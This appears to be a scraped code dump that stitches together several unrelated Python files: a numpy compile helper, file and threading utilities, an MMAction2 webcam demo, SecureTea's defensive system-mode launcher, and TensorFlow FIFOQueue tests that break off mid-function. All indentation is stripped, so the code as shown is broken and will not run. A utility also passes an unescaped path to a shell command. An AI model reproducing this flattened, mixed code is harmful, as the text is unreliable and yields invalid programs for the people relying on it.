cres = np.array(res(args)).astype(restype)
if not shape:
if cres.shape:
cres = cres[0]
else:
if shape and cres.shape != shape:
cres = np.ones(shape)*cres
return cres
call.restype = restype
if parallel:
return make_parallel(call)
else:
return call
def ncompile(*function_definitions):
functions = {}
for definition in function_definitions:
if definition.return_type is not None:
restype = definition.return_type.value.__dict__.get('python_type')
else:
restype = None
f = numpyfy(definition.expr,parallel=definition.parallel,restype=restype)
if definition.arg_types:
# TODO: implement argument type conversions
arg_types = [arg.value.__dict__.get('python_type') for arg in definition.arg_types]
arg_names = [arg.name for arg in definition.args]
class Delegate(object):
def __init__(self,f,arg_names):
self.f = f
self.arg_names = arg_names
def __call__(self, *args, **kwargs):
args = { n:a for n,a in zip(self.arg_names,args) }
res = kwargs.pop('res',None)
if res is not None:
res[:] = self.f(**args)
return res
else:
return self.f(**args)
functions[definition.name] = Delegate(f,arg_names)
class lib(object):
def __init__(self,functions):
self.__dict__.update(functions)
return lib(functions)
|
utils.py | from threading import Lock, Thread, active_count as threading_active_count
from posixpath import join as os_join, normpath as os_normpath
from json import load as json_load, dump as json_dump
from subprocess import Popen, PIPE
from calendar import monthrange
from httplib2 import Http
from shutil import rmtree
from time import sleep
import datetime
import os
def mkpath(*paths):
return os_normpath(os_join(*paths))
def _pass(*args, **kwargs):
pass
def clear_folder(path, folders=False):
for item in os.listdir(mkpath(path)):
if os.path.isfile(mkpath(path, item)):
os.remove(mkpath(path, item))
elif os.path.isdir(mkpath(path, item)):
rmtree(mkpath(path, item))
def create_folder_if_absent(path):
if not os.path.isdir(mkpath(path)):
os.makedirs(mkpath(path))
def add_months(sourcedate, months):
month = sourcedate.month - 1 + months
year = sourcedate.year + month // 12
month = month % 12 + 1
day = min(sourcedate.day, monthrange(year, month)[1])
return datetime.date(year, month, day)
def remove_metadata(path, extension="jpg", exiftool=mkpath("exiftool", "exiftool")):
print('Removing metadata in "{}"...'.format(path))
s = Popen(
# exiftool -all= --icc_profile:all -overwrite_original -progress -ext jpg -r "../api" [recursive]
"\"{}\" -all= --icc_profile:all -overwrite_original -progress -ext \"{}\" \"{}\"".format(exiftool, extension, path),
shell=True,
stdout=PIPE,
stderr=PIPE
).communicate()
s = list(map(lambda x: x.decode("cp1251"), s))
print(s)
class FileDownloader:
def __init__(self):
self.h = Http('cache/.http_cache')
self.thread_lock = Lock()
def download(self, url, path):
with self.thread_lock:
with open(mkpath(path), 'wb') as file:
response, content = self.h.request(url)
file.write(content)
def __del__(self):
if os.path.isdir('cache/.http_cache'):
rmtree('cache/.http_cache')
class SafeJson:
def __init__(self):
self.default_cache_timer = 500 # > 1 is unsafe
self.thread_lock = Lock()
self.cache = {}
self.cache_timer = self.default_cache_timer
# def __del__(self):
# '''Not working: "open" has already been deleted by the GC'''
# self.dump_cache()
def dump(self, path, data, allow_cache=False, ensure_ascii=False, prettify=False, *args, **kwargs):
kwargs["ensure_ascii"] = ensure_ascii
self.cache[os.path.abspath(mkpath(path))] = (data, prettify, args, kwargs)
self.cache_timer -= 1
if not allow_cache or self.cache_timer == 0:
self.dump_cache()
def dump_cache(self):
self.cache_timer = self.default_cache_timer
for filepath, content in self.cache.items():
data, prettify, args, kwargs = content
with self.thread_lock:
with open(filepath, 'w', encoding="utf-8") as file:
if prettify:
json_dump(data, file, indent=4, *args, **kwargs)
else:
json_dump(data, file, separators=(',', ':'), *args, **kwargs)
self.cache = {}
def load(self, path, *args, **kwargs):
with self.thread_lock:
with open(os.path.abspath(mkpath(path)), 'r', encoding="utf-8") as file:
data = json_load(file, *args, **kwargs)
return data
class Threads:
def __init__(self):
self.threads = []
def __del__(self):
self.join()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.join()
def add(self, target, args, **kwargs):
self.threads.append(Thread(target=target, args=args, **kwargs))
return self.threads[-1]
def join(self):
for t in self.threads:
t.join()
def active_count(self):
return threading_active_count()
def wait_free(self, count):
while threading_active_count() > count:
sleep(0.01)
def prettify_data_string(string):
return string.replace("\r\n", '\n').replace("\n\r", '\n').replace('\xa0', ' ').strip()
|
webcam_demo.py | import argparse
import time
from collections import deque
from operator import itemgetter
from threading import Thread
import cv2
import numpy as np
import torch
from mmcv import Config, DictAction
from mmcv.parallel import collate, scatter
from mmaction.apis import init_recognizer
from mmaction.datasets.pipelines import Compose
FONTFACE = cv2.FONT_HERSHEY_COMPLEX_SMALL
FONTSCALE = 1
FONTCOLOR = (255, 255, 255) # BGR, white
MSGCOLOR = (128, 128, 128) # BGR, gray
THICKNESS = 1
LINETYPE = 1
EXCLUED_STEPS = [
'OpenCVInit', 'OpenCVDecode', 'DecordInit', 'DecordDecode', 'PyAVInit',
'PyAVDecode', 'RawFrameDecode'
]
def parse_args():
parser = argparse.ArgumentParser(description='MMAction2 webcam demo')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', help='checkpoint file')
parser.add_argument('label', help='label file')
parser.add_argument(
'--device', type=str, default='cuda:0', help='CPU/CUDA device option')
parser.add_argument(
'--camera-id', type=int, default=0, help='camera device id')
parser.add_argument(
'--threshold',
type=float,
default=0.01,
help='recognition score threshold')
parser.add_argument(
'--average-size',
type=int,
default=1,
help='number of latest clips to be averaged for prediction')
parser.add_argument(
'--drawing-fps',
type=int,
default=20,
help='Set upper bound FPS value of the output drawing')
parser.add_argument(
'--inference-fps',
type=int,
default=4,
help='Set upper bound FPS value of model inference')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
default={},
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. For example, '
"'--cfg-options model.backbone.depth=18 model.backbone.with_cp=True'")
args = parser.parse_args()
assert args.drawing_fps >= 0 and args.inference_fps >= 0, \
'upper bound FPS value of drawing and inference should be set as ' \
'positive number, or zero for no limit'
return args
def show_results():
print('Press "Esc", "q" or "Q" to exit')
text_info = {}
cur_time = time.time()
while True:
msg = 'Waiting for action ...'
_, frame = camera.read()
frame_queue.append(np.array(frame[:, :, ::-1]))
if len(result_queue) != 0:
text_info = {}
results = result_queue.popleft()
for i, result in enumerate(results):
selected_label, score = result
if score < threshold:
break
location = (0, 40 + i * 20)
text = selected_label + ': ' + str(round(score, 2))
text_info[location] = text
cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
FONTCOLOR, THICKNESS, LINETYPE)
elif len(text_info) != 0:
for location, text in text_info.items():
cv2.putText(frame, text, location, FONTFACE, FONTSCALE,
FONTCOLOR, THICKNESS, LINETYPE)
else:
cv2.putText(frame, msg, (0, 40), FONTFACE, FONTSCALE, MSGCOLOR,
THICKNESS, LINETYPE)
cv2.imshow('camera', frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord('q') or ch == ord('Q'):
break
if drawing_fps > 0:
# add a limiter for actual drawing fps <= drawing_fps
sleep_time = 1 / drawing_fps - (time.time() - cur_time)
if sleep_time > 0:
time.sleep(sleep_time)
cur_time = time.time()
def inference():
score_cache = deque()
scores_sum = 0
cur_time = time.time()
while True:
cur_windows = []
while len(cur_windows) == 0:
if len(frame_queue) == sample_length:
cur_windows = list(np.array(frame_queue))
if data['img_shape'] is None:
data['img_shape'] = frame_queue.popleft().shape[:2]
cur_data = data.copy()
cur_data['imgs'] = cur_windows
cur_data = test_pipeline(cur_data)
cur_data = collate([cur_data], samples_per_gpu=1)
if next(model.parameters()).is_cuda:
cur_data = scatter(cur_data, [device])[0]
with torch.no_grad():
scores = model(return_loss=False, **cur_data)[0]
score_cache.append(scores)
scores_sum += scores
if len(score_cache) == average_size:
scores_avg = scores_sum / average_size
num_selected_labels = min(len(label), 5)
scores_tuples = tuple(zip(label, scores_avg))
scores_sorted = sorted(
scores_tuples, key=itemgetter(1), reverse=True)
results = scores_sorted[:num_selected_labels]
result_queue.append(results)
scores_sum -= score_cache.popleft()
if inference_fps > 0:
# add a limiter for actual inference fps <= inference_fps
sleep_time = 1 / inference_fps - (time.time() - cur_time)
if sleep_time > 0:
time.sleep(sleep_time)
cur_time = time.time()
camera.release()
cv2.destroyAllWindows()
def main():
global frame_queue, camera, frame, results, threshold, sample_length, \
data, test_pipeline, model, device, average_size, label, \
result_queue, drawing_fps, inference_fps
args = parse_args()
average_size = args.average_size
threshold = args.threshold
drawing_fps = args.drawing_fps
inference_fps = args.inference_fps
device = torch.device(args.device)
cfg = Config.fromfile(args.config)
cfg.merge_from_dict(args.cfg_options)
model = init_recognizer(cfg, args.checkpoint, device=device)
camera = cv2.VideoCapture(args.camera_id)
data = dict(img_shape=None, modality='RGB', label=-1)
with open(args.label, 'r') as f:
label = [line.strip() for line in f]
# prepare test pipeline from non-camera pipeline
cfg = model.cfg
sample_length = 0
pipeline = cfg.data.test.pipeline
pipeline_ = pipeline.copy()
for step in pipeline:
if 'SampleFrames' in step['type']:
sample_length = step['clip_len'] * step['num_clips']
data['num_clips'] = step['num_clips']
data['clip_len'] = step['clip_len']
pipeline_.remove(step)
if step['type'] in EXCLUED_STEPS:
# remove step to decode frames
pipeline_.remove(step)
test_pipeline = Compose(pipeline_)
assert sample_length > 0
try:
frame_queue = deque(maxlen=sample_length)
result_queue = deque(maxlen=1)
pw = Thread(target=show_results, args=(), daemon=True)
pr = Thread(target=inference, args=(), daemon=True)
pw.start()
pr.start()
pw.join()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
|
system_mode.py | # -*- coding: utf-8 -*-
u"""System Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 30 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for system mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.firewall import secureTeaFirewall
from securetea import logger
import multiprocessing
import sys
class SystemMode(object):
"""SystemMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize SystemMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.antivirus = False
self.system_log = False
# Initialize empty process pool list
self.process_pool = list()
def create_objects(self):
"""
Create module (Firewall, IDS, AntiVirus,
System Log Monitor) objects if configuraton
parameters are available for those.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing Intrusion Detection System (IDS) object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized Intrusion Detection System (IDS) object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("antivirus"):
try:
# Initialize AntiVirus object
self.logger.log(
"Initializing AntiVirus object",
logtype="info"
)
# Initialize AntiVirus object
self.antivirus_obj = SecureTeaAntiVirus(debug=self.debug,
cred=self.cred["antivirus"])
self.antivirus = True
self.logger.log(
"Initialized AntiVirus object",
logtype="info"
)
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
# Only debug configuratons are required for System Log Monitor, hnece create them plainly
try:
self.logger.log(
"Initializing System Log Monitor object",
logtype="info"
)
# Initialize SystemLogEngine object
self.system_log_obj = engine.SystemLogEngine(debug=self.debug)
self.system_log = True
self.logger.log(
"Initialized System Log Monitor object",
logtype="info"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.antivirus: # if AntiVirus object is initialized
antivirus_process = multiprocessing.Process(target=self.antivirus_obj.start)
self.process_pool.append(antivirus_process)
if self.system_log: # if System Log Monitor object is initialized
system_log_process = multiprocessing.Process(target=self.system_log_obj.run)
self.process_pool.append(system_log_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_system_mode(self):
"""
Start SecureTea in system mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
fifo_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.FIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class FIFOQueueTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list {} } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.FIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'FIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueHalf(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float16)
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=(3, 2))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(
10, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
@test_util.run_in_graph_and_eager_modes
def testMultipleDequeues(self):
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue_many([[1, 2, 3]]))
a, b, c = self.evaluate([q.dequeue(), q.dequeue(), q.dequeue()])
self.assertAllEqual(set([1, 2, 3]), set([a, b, c]))
@test_util.run_in_graph_and_eager_modes
def testQueuesDontShare(self):
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue(1))
q2 = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q2.enqueue(2))
self.assertAllEqual(self.evaluate(q2.dequeue()), 2)
self.assertAllEqual(self.evaluate(q.dequeue()), 1)
def testEnqueueDictWithoutNames(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
with self.assertRaisesRegexp(ValueError, "must have names"):
q.enqueue({"a": 12.0})
with self.assertRaisesRegexp(ValueError, "must have names"):
q.enqueue_many({"a": [12.0, 13.0]})
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testDequeueHalf(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float16)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(3, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = self.evaluate(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], self.evaluate(size_t))
enqueue_op.run()
self.assertEqual([0], self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError("specified shapes"):
q.dequeue_many(0).eval()
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, ())
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.FIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
float_val, int_val = self.evaluate(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.int32, (4, 4, 4, 4))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32), ((),
(2)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.int32,
dtypes_lib.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(
([1, 2, 3], [1, 2], array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many(
(array_ops.placeholder(dtypes_lib.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(dtypes_lib.int32, enq.inputs[1].dtype)
self.assertEqual(dtypes_lib.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32), (
(), ()))
with self.assertRaises(ValueError):
q.enqueue((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
